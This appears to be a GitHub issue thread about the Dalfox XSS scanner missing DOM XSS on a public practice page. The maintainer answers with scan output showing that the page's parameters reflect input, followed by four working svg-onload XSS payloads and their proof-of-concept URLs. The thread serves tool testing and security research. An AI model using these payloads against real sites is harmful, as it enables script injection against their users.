Closed dinosn closed 3 years ago
Thank you for your first issue report :D
The latest version detects the XSS with no issue:
Parameter Analysis and XSS Scanning tool based on golang
Finder Of XSS and Dal is the Korean pronunciation of moon. @hahwul
[*] Using single target mode
[*] Target URL: http://brutelogic.com.br/xss.php
[*] Vaild target [ code:200 / size:1727 ]
[*] Using dictionary mining option [list=GF-Patterns]
[*] Using DOM mining option
[*] Start BAV(Basic Another Vulnerability) analysis / [sqli, ssti, OpenRedirect]
[*] Start parameter analysis..
[*] Start static analysis..
[*] BAV analysis done
[I] Found 5 testing point in DOM Mining
[*] Static analysis done
[*] Parameter analysis done
[I] Content-Type is text/html; charset=UTF-8
[I] Access-Control-Allow-Origin is *
[I] Reflected b1 param => Injected: /inATTR-double(1) > ] { $ ` + - = [ ) ; " ' . ( : < | } ,
25 line: <input type="text" name="b1" value="Dal
[I] Reflected b2 param => Injected: /inATTR-single(1) > $ [ { ` " ' ; } = ] ( : + | - , < ) .
31 line: <input type="text" name="b2" value='Dal
[I] Reflected b3 param => Injected: /inATTR-double(1) + { | ; = [ ) - $ ' ( } : < " ] ` , .
37 line: <input type="text" name="b3" value="Dal
[I] Reflected b4 param => Injected: /inATTR-single(1) + ; , " $ ( = : < ` ' ] - . [ } { | )
43 line: <input type="text" name="b4" value='Dal
[*] Generate XSS payload and optimization.Optimization..
[*] Start XSS Scanning.. with 513 queries
[V] Triggered XSS Payload (found DOM Object): b4='><svg/class='dalfox'onLoad=alert(45)>
[POC][V][GET] http://brutelogic.com.br/xss.php?b4=%27%3E%3Csvg%2Fclass%3D%27dalfox%27onLoad%3Dalert%2845%29%3E
[V] Triggered XSS Payload (found DOM Object): b2='"><svg/class=dalfox onload=alert()//
31 line: t" name="b2" value=''"><svg/class=dalfox onload=alert(&#
[POC][V][GET] http://brutelogic.com.br/xss.php?b2=%27%22%3E%3Csvg%2Fclass%3Ddalfox+onload%3D%26%2397%26%23108%26%23101%26%23114%26%2300116%26%2340%26%2341%26%23x2f%26%23x2f
[V] Triggered XSS Payload (found DOM Object): b1="><svg/OnLoad="`${prompt``}`" class=dalfox>
25 line: t" name="b1" value=""><svg/OnLoad="`${prompt``}`" class=dalfox>">
[POC][V][GET] http://brutelogic.com.br/xss.php?b1=%22%3E%3Csvg%2FOnLoad%3D%22%60%24%7Bprompt%60%60%7D%60%22+class%3Ddalfox%3E
[V] Triggered XSS Payload (found DOM Object): b3="><svg/class="dalfox"onLoad=alert(45)>
[POC][V][GET] http://brutelogic.com.br/xss.php?b3=%22%3E%3Csvg%2Fclass%3D%22dalfox%22onLoad%3Dalert%2845%29%3E
[*] Finish :D
I'm closing the bug :)
Hi,
Whilst testing for DOM XSS cases using http://brutelogic.com.br/xss.php as example, I noticed that none of the parameters were identified.
Dalfox
Using a different tool the xss in the DOM are visible at the following locations,
Environment